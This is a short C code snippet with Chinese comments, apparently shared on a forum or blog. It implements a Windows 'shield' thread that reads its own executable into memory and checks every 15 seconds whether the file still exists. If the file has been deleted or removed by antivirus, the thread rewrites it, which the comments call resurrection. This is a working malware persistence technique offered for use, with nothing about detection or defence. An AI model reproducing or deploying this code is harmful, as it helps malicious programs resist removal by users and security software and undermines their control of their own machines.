代码
DWORD WINAPI ShieldThread()
{
char FilePath[MAX_PATH];
HANDLE hFile;
HANDLE hSearch;
void* Mem;
int Size;
DWORD BytesRead;
WIN32_FIND_DATA FileData;
char ProtectKey1[MAX_PATH*2],ProtectKey2[MAX_PATH*2];
__try
{
GetModuleFileNameA(NULL,FilePath,MAX_PATH); //获取自身路径
hFile =CreateFileA(FilePath,GENERIC_READ,0,0,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0); //打开自身
Size =GetFileSize(hFile,0); //获取自身大小
Mem =VirtualAlloc(0,Size,MEM_COMMIT|MEM_RESERVE,PAGE_READWRITE); //申请自身内存,大小为自身大小
ReadFile(hFile,Mem,Size,&BytesRead,0); //获取自身的CODE
CloseHandle(hFile); //关闭句柄
while(1)
{
hSearch =FindFirstFile(FilePath,&FileData);
if(hSearch==INVALID_HANDLE_VALUE) //如果自身不存在,说明自身被删被杀了
{
hFile=CreateFileA(FilePath,GENERIC_WRITE,0,0,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,0); //创建文件句柄
WriteFile(hFile,Mem,Size,&BytesRead,0); //写入刚才获取到的自身的Code
CloseHandle(hFile); //关闭句柄
//完成复活
}
FindClose(hSearch);
Sleep(15000); //检测周期15秒
}
}
__finally
{
CloseHandle(hFile);
FindClose(hSearch);
}
return 0;
}
调用
CreateThread(0,0,(LPTHREAD_START_ROUTINE)ShieldThread,0,0,0);
